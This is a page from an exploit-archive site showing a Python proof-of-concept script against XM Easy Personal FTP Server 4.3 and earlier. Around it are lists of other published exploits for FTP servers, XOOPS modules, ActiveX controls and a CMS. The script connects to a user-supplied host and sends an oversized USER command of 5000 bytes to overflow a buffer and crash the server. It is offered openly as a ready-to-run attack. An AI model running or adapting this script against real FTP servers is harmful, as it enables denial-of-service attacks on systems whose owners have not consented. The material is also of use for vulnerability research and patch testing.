exploits , vulnerabilities , articles , XM Easy Personal FTP Server <= 4.3 (USER) Remote Buffer Overflow PoC

2007-06-13 Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-04-14 ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
2007-04-06 FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)
2007-04-02 Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit
2007-03-27 Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)
2007-03-25 WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets)

2006-05-04

XM Easy Personal FTP Server <= 4.3 (USER) Remote Buffer Overflow PoC

Rated as : High Risk

#############################################################
# XM EASY PERSONAL FTP SERVER v4.3                           #  
# http://www.securityfocus.com/archive/1/432960/30/0/threaded# 
# Buffer Overflow Vulnerability PoC                          #  
# ahmed@rewterz.com                                          #
##############################################################

import socket
import struct
import time
import sys


buff='USER '+'A'*5000+'\r\n'

if len(sys.argv)!=3:
	print "[+] Usage: %s <ip> <port> \n" %sys.argv[0]
	sys.exit(0)

try:
	
        print "[+] Connecting to %s" %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect((sys.argv[1],int(sys.argv[2])))
	print "[+] Sending Evil buffer"
	time.sleep(1)
	s.send(buff)
        print "[+] Service Crashed"
        s.recv(1024)
	
except:
	print "[+] Could Not Connect To ftp server"
securitydot.net - 2006-05-04

Exploits - newest 10 RSS | More

2007-06-15 56939 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33993 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42131 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29190 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19613 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16590 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19262 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16450 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33431 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17115 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit